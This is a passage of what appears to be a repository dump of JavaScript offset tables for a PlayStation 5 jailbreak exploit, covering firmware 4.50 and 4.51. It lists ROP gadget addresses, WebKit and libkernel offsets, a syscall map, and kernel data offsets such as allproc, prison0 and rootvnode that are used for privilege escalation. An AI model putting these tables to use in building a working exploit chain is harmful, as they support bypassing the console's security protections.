353 | 0x2AB: 0x35320, // sys_bindat
354 | 0x2AC: 0x33B20, // sys_connectat
355 | 0x2AD: 0x32D80, // sys_chflagsat
356 | 0x2AE: 0x32BD0, // sys_accept4
357 | 0x2AF: 0x331C0, // sys_pipe2
358 | 0x2B0: 0x33BC0, // sys_aio_mlock
359 | 0x2B1: 0x352A0, // sys_procctl
360 | 0x2B2: 0x34550, // sys_ppoll
361 | 0x2B3: 0x34490, // sys_futimens
362 | 0x2B4: 0x34C40, // sys_utimensat
363 | 0x2B5: 0x341B0, // sys_numa_getaffinity
364 | 0x2B6: 0x34010, // sys_numa_setaffinity
365 | 0x2C1: 0x33020, // sys_get_phys_page_size
366 | 0x2C9: 0x35280, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x33860, // sys_openintr
368 | 0x2CD: 0x34350, // sys_dl_get_info_2
369 | 0x2CE: 0x33940, // sys_acinfo_add
370 | 0x2CF: 0x32BB0, // sys_acinfo_delete
371 | 0x2D0: 0x34BE0, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x34CA0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32E00, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x8AD3;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x318AD3;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xF18AD3;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x27EDCB8;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6506474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x650647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6506498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6506500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1D34D00;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x66E74C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/4.50.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00D04580;
2 | const OFFSET_wk_memset_import = 0x028F9D38;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028F9A18;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x00001B60;
7 | const OFFSET_lk_pthread_join = 0x0002FAD0;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x000148F0;
12 | const OFFSET_lc_setjmp = 0x0005E9B0;
13 | const OFFSET_lc_longjmp = 0x0005EA00;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00043B7C,
20 | "pop rsi": 0x0008F33E,
21 | "pop rdx": 0x000156EA,
22 | "pop rcx": 0x00060DF3,
23 | "pop r8": 0x01262A4F,
24 | "pop r9" : 0x004E450C,
25 | "pop rax": 0x00084094,
26 | "pop rsp": 0x0005D293,
27 |
28 | "mov [rdi], rsi": 0x00118570,
29 | "mov [rdi], rax": 0x00C3A5C0,
30 | "mov [rdi], eax": 0x003FB6E6,
31 |
32 | "infloop": 0x000109E1,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00204122,
36 | "sete al" : 0x00B7B735,
37 | "seta al" : 0x000CCFB4,
38 | "setb al" : 0x001B7657,
39 | "setg al" : 0x000708c9,
40 | "setl al" : 0x01517692,
41 | "shl rax, 3" : 0x01A43F03,
42 | "add rax, rdx" : 0x016F4948,
43 | "mov rax, [rax]" : 0x0142E309,
44 | "inc dword [rax]": 0x017629AF,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x34230, // sys_exit
49 | 0x002: 0x351E0, // sys_fork
50 | 0x003: 0x33400, // sys_read
51 | 0x004: 0x33360, // sys_write
52 | 0x005: 0x33A00, // sys_open
53 | 0x006: 0x34030, // sys_close
54 | 0x007: 0x32C20, // sys_wait4
55 | 0x00A: 0x34D20, // sys_unlink
56 | 0x00C: 0x346B0, // sys_chdir
57 | 0x00F: 0x340B0, // sys_chmod
58 | 0x014: 0x33580, // sys_getpid
59 | 0x017: 0x33080, // sys_setuid
60 | 0x018: 0x34690, // sys_getuid
61 | 0x019: 0x33A40, // sys_geteuid
62 | 0x01B: 0x33AE0, // sys_recvmsg
63 | 0x01C: 0x33D10, // sys_sendmsg
64 | 0x01D: 0x34860, // sys_recvfrom
65 | 0x01E: 0x32F80, // sys_accept
66 | 0x01F: 0x32DA0, // sys_getpeername
67 | 0x020: 0x34EC0, // sys_getsockname
68 | 0x021: 0x349E0, // sys_access
69 | 0x022: 0x34B60, // sys_chflags
70 | 0x023: 0x34530, // sys_fchflags
71 | 0x024: 0x35410, // sys_sync
72 | 0x025: 0x339E0, // sys_kill
73 | 0x027: 0x33480, // sys_getppid
74 | 0x029: 0x34A40, // sys_dup
75 | 0x02A: 0x333D0, // sys_pipe
76 | 0x02B: 0x35080, // sys_getegid
77 | 0x02C: 0x353D0, // sys_profil
78 | 0x02F: 0x32F20, // sys_getgid
79 | 0x031: 0x32F00, // sys_getlogin
80 | 0x032: 0x34790, // sys_setlogin
81 | 0x035: 0x33140, // sys_sigaltstack
82 | 0x036: 0x332A0, // sys_ioctl
83 | 0x037: 0x34570, // sys_reboot
84 | 0x038: 0x34470, // sys_revoke
85 | 0x03B: 0x34770, // sys_execve
86 | 0x041: 0x34110, // sys_msync
87 | 0x049: 0x33900, // sys_munmap
88 | 0x04A: 0x34670, // sys_mprotect
89 | 0x04B: 0x337F0, // sys_madvise
90 | 0x04E: 0x339C0, // sys_mincore
91 | 0x04F: 0x32E80, // sys_getgroups
92 | 0x050: 0x33420, // sys_setgroups
93 | 0x053: 0x32E60, // sys_setitimer
94 | 0x056: 0x32C80, // sys_getitimer
95 | 0x059: 0x344D0, // sys_getdtablesize
96 | 0x05A: 0x348E0, // sys_dup2
97 | 0x05C: 0x33F10, // sys_fcntl
98 | 0x05D: 0x33A60, // sys_select
99 | 0x05F: 0x32EC0, // sys_fsync
100 | 0x060: 0x33DF0, // sys_setpriority
101 | 0x061: 0x33640, // sys_socket
102 | 0x062: 0x346D0, // sys_connect
103 | 0x063: 0x35040, // sys_netcontrol
104 | 0x064: 0x32C40, // sys_getpriority
105 | 0x065: 0x34C60, // sys_netabort
106 | 0x066: 0x34FE0, // sys_netgetsockinfo
107 | 0x068: 0x34CE0, // sys_bind
108 | 0x069: 0x33F50, // sys_setsockopt
109 | 0x06A: 0x33240, // sys_listen
110 | 0x071: 0x34250, // sys_socketex
111 | 0x072: 0x33C20, // sys_socketclose
112 | 0x074: 0x353F0, // sys_gettimeofday
113 | 0x075: 0x354D0, // sys_getrusage
114 | 0x076: 0x32C00, // sys_getsockopt
115 | 0x078: 0x33E90, // sys_readv
116 | 0x079: 0x33CF0, // sys_writev
117 | 0x07A: 0x34940, // sys_settimeofday
118 | 0x07C: 0x33880, // sys_fchmod
119 | 0x07D: 0x340F0, // sys_netgetiflist
120 | 0x07E: 0x34FC0, // sys_setreuid
121 | 0x07F: 0x33BE0, // sys_setregid
122 | 0x080: 0x34B40, // sys_rename
123 | 0x083: 0x33B60, // sys_flock
124 | 0x085: 0x35430, // sys_sendto
125 | 0x086: 0x35260, // sys_shutdown
126 | 0x087: 0x345F0, // sys_socketpair
127 | 0x088: 0x34390, // sys_mkdir
128 | 0x089: 0x335E0, // sys_rmdir
129 | 0x08A: 0x32AF0, // sys_utimes
130 | 0x08C: 0x34F80, // sys_adjtime
131 | 0x08D: 0x340D0, // sys_kqueueex
132 | 0x093: 0x34330, // sys_setsid
133 | 0x0A5: 0x32E20, // sys_sysarch
134 | 0x0B6: 0x34DC0, // sys_setegid
135 | 0x0B7: 0x32C60, // sys_seteuid
136 | 0x0BC: 0x34E20, // sys_stat
137 | 0x0BD: 0x35220, // sys_fstat
138 | 0x0BE: 0x33C00, // sys_lstat
139 | 0x0BF: 0x33300, // sys_pathconf
140 | 0x0C0: 0x345B0, // sys_fpathconf
141 | 0x0C2: 0x33B40, // sys_getrlimit
142 | 0x0C3: 0x33720, // sys_setrlimit
143 | 0x0C4: 0x34D40, // sys_getdirentries
144 | 0x0CA: 0x34B20, // sys___sysctl
145 | 0x0CB: 0x341D0, // sys_mlock
146 | 0x0CC: 0x34BC0, // sys_munlock
147 | 0x0CE: 0x33680, // sys_futimes
148 | 0x0D1: 0x33C60, // sys_poll
149 | 0x0E8: 0x32D20, // sys_clock_gettime
150 | 0x0E9: 0x34190, // sys_clock_settime
151 | 0x0EA: 0x35190, // sys_clock_getres
152 | 0x0EB: 0x34D60, // sys_ktimer_create
153 | 0x0EC: 0x334E0, // sys_ktimer_delete
154 | 0x0ED: 0x35240, // sys_ktimer_settime
155 | 0x0EE: 0x346F0, // sys_ktimer_gettime
156 | 0x0EF: 0x338A0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34C20, // sys_nanosleep
158 | 0x0F1: 0x34450, // sys_ffclock_getcounter
159 | 0x0F2: 0x33440, // sys_ffclock_setestimate
160 | 0x0F3: 0x342D0, // sys_ffclock_getestimate
161 | 0x0F7: 0x34CC0, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x34880, // sys_issetugid
163 | 0x110: 0x35020, // sys_getdents
164 | 0x121: 0x34730, // sys_preadv
165 | 0x122: 0x33C80, // sys_pwritev
166 | 0x136: 0x33980, // sys_getsid
167 | 0x13B: 0x34E40, // sys_aio_suspend
168 | 0x144: 0x33500, // sys_mlockall
169 | 0x145: 0x34900, // sys_munlockall
170 | 0x147: 0x33600, // sys_sched_setparam
171 | 0x148: 0x34270, // sys_sched_getparam
172 | 0x149: 0x32DC0, // sys_sched_setscheduler
173 | 0x14A: 0x33C40, // sys_sched_getscheduler
174 | 0x14B: 0x33AA0, // sys_sched_yield
175 | 0x14C: 0x33040, // sys_sched_get_priority_max
176 | 0x14D: 0x33160, // sys_sched_get_priority_min
177 | 0x14E: 0x33390, // sys_sched_rr_get_interval
178 | 0x154: 0x32B50, // sys_sigprocmask
179 | 0x155: 0x32B90, // sys_sigsuspend
180 | 0x157: 0x34A60, // sys_sigpending
181 | 0x159: 0x34B80, // sys_sigtimedwait
182 | 0x15A: 0x347C0, // sys_sigwaitinfo
183 | 0x16A: 0x34DA0, // sys_kqueue
184 | 0x16B: 0x33000, // sys_kevent
185 | 0x17B: 0x32FA0, // sys_mtypeprotect
186 | 0x188: 0x330C0, // sys_uuidgen
187 | 0x189: 0x35510, // sys_sendfile
188 | 0x18D: 0x33560, // sys_fstatfs
189 | 0x190: 0x33120, // sys_ksem_close
190 | 0x191: 0x33EB0, // sys_ksem_post
191 | 0x192: 0x34750, // sys_ksem_wait
192 | 0x193: 0x354F0, // sys_ksem_trywait
193 | 0x194: 0x33260, // sys_ksem_init
194 | 0x195: 0x34C80, // sys_ksem_open
195 | 0x196: 0x34960, // sys_ksem_unlink
196 | 0x197: 0x330E0, // sys_ksem_getvalue
197 | 0x198: 0x34920, // sys_ksem_destroy
198 | 0x1A0: 0x34E00, // sys_sigaction
199 | 0x1A1: 0x34AA0, // sys_sigreturn
200 | 0x1A5: 0x33780, // sys_getcontext
201 | 0x1A6: 0x344B0, // sys_setcontext
202 | 0x1A7: 0x345D0, // sys_swapcontext
203 | 0x1AD: 0x337D0, // sys_sigwait
204 | 0x1AE: 0x32EA0, // sys_thr_create
205 | 0x1AF: 0x33200, // sys_thr_exit
206 | 0x1B0: 0x33BA0, // sys_thr_self
207 | 0x1B1: 0x33220, // sys_thr_kill
208 | 0x1B9: 0x34840, // sys_ksem_timedwait
209 | 0x1BA: 0x32B70, // sys_thr_suspend
210 | 0x1BB: 0x334A0, // sys_thr_wake
211 | 0x1BC: 0x34510, // sys_kldunloadf
212 | 0x1C6: 0x35200, // sys__umtx_op
213 | 0x1C7: 0x34F40, // sys_thr_new
214 | 0x1C8: 0x34EA0, // sys_sigqueue
215 | 0x1D0: 0x34800, // sys_thr_set_name
216 | 0x1D2: 0x33DB0, // sys_rtprio_thread
217 | 0x1DB: 0x33540, // sys_pread
218 | 0x1DC: 0x34650, // sys_pwrite
219 | 0x1DD: 0x34F20, // sys_mmap
220 | 0x1DE: 0x34A20, // sys_lseek
221 | 0x1DF: 0x33AC0, // sys_truncate
222 | 0x1E0: 0x33520, // sys_ftruncate
223 | 0x1E1: 0x32B10, // sys_thr_kill2
224 | 0x1E2: 0x35490, // sys_shm_open
225 | 0x1E3: 0x34F00, // sys_shm_unlink
226 | 0x1E6: 0x33740, // sys_cpuset_getid
227 | 0x1E7: 0x35300, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34AC0, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32EE0, // sys_openat
230 | 0x203: 0x34590, // sys___cap_rights_get
231 | 0x20A: 0x33FD0, // sys_pselect
232 | 0x214: 0x34090, // sys_regmgr_call
233 | 0x215: 0x33E10, // sys_jitshm_create
234 | 0x216: 0x343F0, // sys_jitshm_alias
235 | 0x217: 0x332E0, // sys_dl_get_list
236 | 0x218: 0x34130, // sys_dl_get_info
237 | 0x21A: 0x34070, // sys_evf_create
238 | 0x21B: 0x334C0, // sys_evf_delete
239 | 0x21C: 0x34410, // sys_evf_open
240 | 0x21D: 0x33FF0, // sys_evf_close
241 | 0x21E: 0x342B0, // sys_evf_wait
242 | 0x21F: 0x34A80, // sys_evf_trywait
243 | 0x220: 0x34430, // sys_evf_set
244 | 0x221: 0x349A0, // sys_evf_clear
245 | 0x222: 0x337B0, // sys_evf_cancel
246 | 0x223: 0x34290, // sys_query_memory_protection
247 | 0x224: 0x33B80, // sys_batch_map
248 | 0x225: 0x33D90, // sys_osem_create
249 | 0x226: 0x32D60, // sys_osem_delete
250 | 0x227: 0x32CE0, // sys_osem_open
251 | 0x228: 0x352E0, // sys_osem_close
252 | 0x229: 0x34370, // sys_osem_wait
253 | 0x22A: 0x34980, // sys_osem_trywait
254 | 0x22B: 0x34610, // sys_osem_post
255 | 0x22C: 0x33EF0, // sys_osem_cancel
256 | 0x22D: 0x33CA0, // sys_namedobj_create
257 | 0x22E: 0x339A0, // sys_namedobj_delete
258 | 0x22F: 0x35570, // sys_set_vm_container
259 | 0x230: 0x33460, // sys_debug_init
260 | 0x233: 0x33DD0, // sys_opmc_enable
261 | 0x234: 0x32E40, // sys_opmc_disable
262 | 0x235: 0x33E50, // sys_opmc_set_ctl
263 | 0x236: 0x33E70, // sys_opmc_set_ctr
264 | 0x237: 0x348C0, // sys_opmc_get_ctr
265 | 0x23C: 0x336E0, // sys_virtual_query
266 | 0x249: 0x34D00, // sys_is_in_sandbox
267 | 0x24A: 0x338C0, // sys_dmem_container
268 | 0x24B: 0x34170, // sys_get_authinfo
269 | 0x24C: 0x32CC0, // sys_mname
270 | 0x24F: 0x332C0, // sys_dynlib_dlsym
271 | 0x250: 0x335C0, // sys_dynlib_get_list
272 | 0x251: 0x35060, // sys_dynlib_get_info
273 | 0x252: 0x33F70, // sys_dynlib_load_prx
274 | 0x253: 0x32F60, // sys_dynlib_unload_prx
275 | 0x254: 0x34DE0, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x33D70, // sys_dynlib_get_proc_param
277 | 0x257: 0x350C0, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32B30, // sys_sandbox_path
279 | 0x259: 0x336A0, // sys_mdbg_service
280 | 0x25A: 0x33D30, // sys_randomized_path
281 | 0x25B: 0x34BA0, // sys_rdup
282 | 0x25C: 0x331A0, // sys_dl_get_metadata
283 | 0x25D: 0x338E0, // sys_workaround8849
284 | 0x25E: 0x330A0, // sys_is_development_mode
285 | 0x25F: 0x34210, // sys_get_self_auth_info
286 | 0x260: 0x354B0, // sys_dynlib_get_info_ex
287 | 0x262: 0x35550, // sys_budget_get_ptype
288 | 0x263: 0x333B0, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x352C0, // sys_get_proc_type_info
290 | 0x265: 0x32AD0, // sys_get_resident_count
291 | 0x267: 0x33E30, // sys_get_resident_fmem_count
292 | 0x268: 0x34EE0, // sys_thr_get_name
293 | 0x269: 0x344F0, // sys_set_gpo
294 | 0x26A: 0x341F0, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32FE0, // sys_test_debug_rwmem
296 | 0x26C: 0x33100, // sys_free_stack
297 | 0x26E: 0x32D00, // sys_ipmimgr_call
298 | 0x26F: 0x34150, // sys_get_gpo
299 | 0x270: 0x35530, // sys_get_vm_map_timestamp
300 | 0x271: 0x34AE0, // sys_opmc_set_hw
301 | 0x272: 0x33620, // sys_opmc_get_hw
302 | 0x273: 0x32CA0, // sys_get_cpu_usage_all
303 | 0x274: 0x34310, // sys_mmap_dmem
304 | 0x275: 0x336C0, // sys_physhm_open
305 | 0x276: 0x33ED0, // sys_physhm_unlink
306 | 0x278: 0x35470, // sys_thr_suspend_ucontext
307 | 0x279: 0x33960, // sys_thr_resume_ucontext
308 | 0x27A: 0x33920, // sys_thr_get_ucontext
309 | 0x27B: 0x33A20, // sys_thr_set_ucontext
310 | 0x27C: 0x33660, // sys_set_timezone_info
311 | 0x27D: 0x343B0, // sys_set_phys_fmem_limit
312 | 0x27E: 0x33760, // sys_utc_to_localtime
313 | 0x27F: 0x35590, // sys_localtime_to_utc
314 | 0x280: 0x34710, // sys_set_uevt
315 | 0x281: 0x33280, // sys_get_cpu_usage_proc
316 | 0x282: 0x33B00, // sys_get_map_statistics
317 | 0x283: 0x348A0, // sys_set_chicken_switches
318 | 0x286: 0x351C0, // sys_get_kernel_mem_statistics
319 | 0x287: 0x343D0, // sys_get_sdk_compiled_version
320 | 0x288: 0x32D40, // sys_app_state_change
321 | 0x289: 0x34F60, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32DE0, // sys_process_terminate
323 | 0x28D: 0x335A0, // sys_blockpool_open
324 | 0x28E: 0x33340, // sys_blockpool_map
325 | 0x28F: 0x34D80, // sys_blockpool_unmap
326 | 0x290: 0x349C0, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x33A80, // sys_blockpool_batch
328 | 0x292: 0x331E0, // sys_fdatasync
329 | 0x293: 0x33700, // sys_dynlib_get_list2
330 | 0x294: 0x35450, // sys_dynlib_get_info2
331 | 0x295: 0x34C00, // sys_aio_submit
332 | 0x296: 0x33180, // sys_aio_multi_delete
333 | 0x297: 0x33FB0, // sys_aio_multi_wait
334 | 0x298: 0x33060, // sys_aio_multi_poll
335 | 0x299: 0x34B00, // sys_aio_get_data
336 | 0x29A: 0x33F90, // sys_aio_multi_cancel
337 | 0x29B: 0x32F40, // sys_get_bio_usage_all
338 | 0x29C: 0x34630, // sys_aio_create
339 | 0x29D: 0x350A0, // sys_aio_submit_cmd
340 | 0x29E: 0x34FA0, // sys_aio_init
341 | 0x29F: 0x34A00, // sys_get_page_table_stats
342 | 0x2A0: 0x34E60, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x35000, // sys_blockpool_move
344 | 0x2A2: 0x34E80, // sys_virtual_query_all
345 | 0x2A3: 0x33F30, // sys_reserve_2mb_page
346 | 0x2A4: 0x347E0, // sys_cpumode_yield
347 | 0x2A5: 0x342F0, // sys_wait6
348 | 0x2A6: 0x33D50, // sys_cap_rights_limit
349 | 0x2A7: 0x33320, // sys_cap_ioctls_limit
350 | 0x2A8: 0x34050, // sys_cap_ioctls_get
351 | 0x2A9: 0x34820, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32FC0, // sys_cap_fcntls_get
353 | 0x2AB: 0x35320, // sys_bindat
354 | 0x2AC: 0x33B20, // sys_connectat
355 | 0x2AD: 0x32D80, // sys_chflagsat
356 | 0x2AE: 0x32BD0, // sys_accept4
357 | 0x2AF: 0x331C0, // sys_pipe2
358 | 0x2B0: 0x33BC0, // sys_aio_mlock
359 | 0x2B1: 0x352A0, // sys_procctl
360 | 0x2B2: 0x34550, // sys_ppoll
361 | 0x2B3: 0x34490, // sys_futimens
362 | 0x2B4: 0x34C40, // sys_utimensat
363 | 0x2B5: 0x341B0, // sys_numa_getaffinity
364 | 0x2B6: 0x34010, // sys_numa_setaffinity
365 | 0x2C1: 0x33020, // sys_get_phys_page_size
366 | 0x2C9: 0x35280, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x33860, // sys_openintr
368 | 0x2CD: 0x34350, // sys_dl_get_info_2
369 | 0x2CE: 0x33940, // sys_acinfo_add
370 | 0x2CF: 0x32BB0, // sys_acinfo_delete
371 | 0x2D0: 0x34BE0, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x34CA0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32E00, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x88F7;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x3188F7;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xF188F7;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x27EDCB8;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6506474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x650647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6506498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6506500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1D34D00;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x66E74C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/4.51.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00D04580;
2 | const OFFSET_wk_memset_import = 0x028F9D38;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028F9A18;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x00001B60;
7 | const OFFSET_lk_pthread_join = 0x0002FAD0;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x000148F0;
12 | const OFFSET_lc_setjmp = 0x0005E9B0;
13 | const OFFSET_lc_longjmp = 0x0005EA00;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00043B7C,
20 | "pop rsi": 0x0008F33E,
21 | "pop rdx": 0x000156EA,
22 | "pop rcx": 0x00060DF3,
23 | "pop r8": 0x01262A4F,
24 | "pop r9" : 0x004E450C,
25 | "pop rax": 0x00084094,
26 | "pop rsp": 0x0005D293,
27 |
28 | "mov [rdi], rsi": 0x00118570,
29 | "mov [rdi], rax": 0x00C3A5C0,
30 | "mov [rdi], eax": 0x003FB6E6,
31 |
32 | "infloop": 0x000109E1,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00204122,
36 | "sete al" : 0x00B7B735,
37 | "seta al" : 0x000CCFB4,
38 | "setb al" : 0x001B7657,
39 | "setg al" : 0x000708C9,
40 | "setl al" : 0x01517692,
41 | "shl rax, 3" : 0x01A43F03,
42 | "add rax, rdx" : 0x016F4948,
43 | "mov rax, [rax]" : 0x0142E309,
44 | "inc dword [rax]": 0x017629AF,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x34230, // sys_exit
49 | 0x002: 0x351E0, // sys_fork
50 | 0x003: 0x33400, // sys_read
51 | 0x004: 0x33360, // sys_write
52 | 0x005: 0x33A00, // sys_open
53 | 0x006: 0x34030, // sys_close
54 | 0x007: 0x32C20, // sys_wait4
55 | 0x00A: 0x34D20, // sys_unlink
56 | 0x00C: 0x346B0, // sys_chdir
57 | 0x00F: 0x340B0, // sys_chmod
58 | 0x014: 0x33580, // sys_getpid
59 | 0x017: 0x33080, // sys_setuid
60 | 0x018: 0x34690, // sys_getuid
61 | 0x019: 0x33A40, // sys_geteuid
62 | 0x01B: 0x33AE0, // sys_recvmsg
63 | 0x01C: 0x33D10, // sys_sendmsg
64 | 0x01D: 0x34860, // sys_recvfrom
65 | 0x01E: 0x32F80, // sys_accept
66 | 0x01F: 0x32DA0, // sys_getpeername
67 | 0x020: 0x34EC0, // sys_getsockname
68 | 0x021: 0x349E0, // sys_access
69 | 0x022: 0x34B60, // sys_chflags
70 | 0x023: 0x34530, // sys_fchflags
71 | 0x024: 0x35410, // sys_sync
72 | 0x025: 0x339E0, // sys_kill
73 | 0x027: 0x33480, // sys_getppid
74 | 0x029: 0x34A40, // sys_dup
75 | 0x02A: 0x333D0, // sys_pipe
76 | 0x02B: 0x35080, // sys_getegid
77 | 0x02C: 0x353D0, // sys_profil
78 | 0x02F: 0x32F20, // sys_getgid
79 | 0x031: 0x32F00, // sys_getlogin
80 | 0x032: 0x34790, // sys_setlogin
81 | 0x035: 0x33140, // sys_sigaltstack
82 | 0x036: 0x332A0, // sys_ioctl
83 | 0x037: 0x34570, // sys_reboot
84 | 0x038: 0x34470, // sys_revoke
85 | 0x03B: 0x34770, // sys_execve
86 | 0x041: 0x34110, // sys_msync
87 | 0x049: 0x33900, // sys_munmap
88 | 0x04A: 0x34670, // sys_mprotect
89 | 0x04B: 0x337F0, // sys_madvise
90 | 0x04E: 0x339C0, // sys_mincore
91 | 0x04F: 0x32E80, // sys_getgroups
92 | 0x050: 0x33420, // sys_setgroups
93 | 0x053: 0x32E60, // sys_setitimer
94 | 0x056: 0x32C80, // sys_getitimer
95 | 0x059: 0x344D0, // sys_getdtablesize
96 | 0x05A: 0x348E0, // sys_dup2
97 | 0x05C: 0x33F10, // sys_fcntl
98 | 0x05D: 0x33A60, // sys_select
99 | 0x05F: 0x32EC0, // sys_fsync
100 | 0x060: 0x33DF0, // sys_setpriority
101 | 0x061: 0x33640, // sys_socket
102 | 0x062: 0x346D0, // sys_connect
103 | 0x063: 0x35040, // sys_netcontrol
104 | 0x064: 0x32C40, // sys_getpriority
105 | 0x065: 0x34C60, // sys_netabort
106 | 0x066: 0x34FE0, // sys_netgetsockinfo
107 | 0x068: 0x34CE0, // sys_bind
108 | 0x069: 0x33F50, // sys_setsockopt
109 | 0x06A: 0x33240, // sys_listen
110 | 0x071: 0x34250, // sys_socketex
111 | 0x072: 0x33C20, // sys_socketclose
112 | 0x074: 0x353F0, // sys_gettimeofday
113 | 0x075: 0x354D0, // sys_getrusage
114 | 0x076: 0x32C00, // sys_getsockopt
115 | 0x078: 0x33E90, // sys_readv
116 | 0x079: 0x33CF0, // sys_writev
117 | 0x07A: 0x34940, // sys_settimeofday
118 | 0x07C: 0x33880, // sys_fchmod
119 | 0x07D: 0x340F0, // sys_netgetiflist
120 | 0x07E: 0x34FC0, // sys_setreuid
121 | 0x07F: 0x33BE0, // sys_setregid
122 | 0x080: 0x34B40, // sys_rename
123 | 0x083: 0x33B60, // sys_flock
124 | 0x085: 0x35430, // sys_sendto
125 | 0x086: 0x35260, // sys_shutdown
126 | 0x087: 0x345F0, // sys_socketpair
127 | 0x088: 0x34390, // sys_mkdir
128 | 0x089: 0x335E0, // sys_rmdir
129 | 0x08A: 0x32AF0, // sys_utimes
130 | 0x08C: 0x34F80, // sys_adjtime
131 | 0x08D: 0x340D0, // sys_kqueueex
132 | 0x093: 0x34330, // sys_setsid
133 | 0x0A5: 0x32E20, // sys_sysarch
134 | 0x0B6: 0x34DC0, // sys_setegid
135 | 0x0B7: 0x32C60, // sys_seteuid
136 | 0x0BC: 0x34E20, // sys_stat
137 | 0x0BD: 0x35220, // sys_fstat
138 | 0x0BE: 0x33C00, // sys_lstat
139 | 0x0BF: 0x33300, // sys_pathconf
140 | 0x0C0: 0x345B0, // sys_fpathconf
141 | 0x0C2: 0x33B40, // sys_getrlimit
142 | 0x0C3: 0x33720, // sys_setrlimit
143 | 0x0C4: 0x34D40, // sys_getdirentries
144 | 0x0CA: 0x34B20, // sys___sysctl
145 | 0x0CB: 0x341D0, // sys_mlock
146 | 0x0CC: 0x34BC0, // sys_munlock
147 | 0x0CE: 0x33680, // sys_futimes
148 | 0x0D1: 0x33C60, // sys_poll
149 | 0x0E8: 0x32D20, // sys_clock_gettime
150 | 0x0E9: 0x34190, // sys_clock_settime
151 | 0x0EA: 0x35190, // sys_clock_getres
152 | 0x0EB: 0x34D60, // sys_ktimer_create
153 | 0x0EC: 0x334E0, // sys_ktimer_delete
154 | 0x0ED: 0x35240, // sys_ktimer_settime
155 | 0x0EE: 0x346F0, // sys_ktimer_gettime
156 | 0x0EF: 0x338A0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34C20, // sys_nanosleep
158 | 0x0F1: 0x34450, // sys_ffclock_getcounter
159 | 0x0F2: 0x33440, // sys_ffclock_setestimate
160 | 0x0F3: 0x342D0, // sys_ffclock_getestimate
161 | 0x0F7: 0x34CC0, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x34880, // sys_issetugid
163 | 0x110: 0x35020, // sys_getdents
164 | 0x121: 0x34730, // sys_preadv
165 | 0x122: 0x33C80, // sys_pwritev
166 | 0x136: 0x33980, // sys_getsid
167 | 0x13B: 0x34E40, // sys_aio_suspend
168 | 0x144: 0x33500, // sys_mlockall
169 | 0x145: 0x34900, // sys_munlockall
170 | 0x147: 0x33600, // sys_sched_setparam
171 | 0x148: 0x34270, // sys_sched_getparam
172 | 0x149: 0x32DC0, // sys_sched_setscheduler
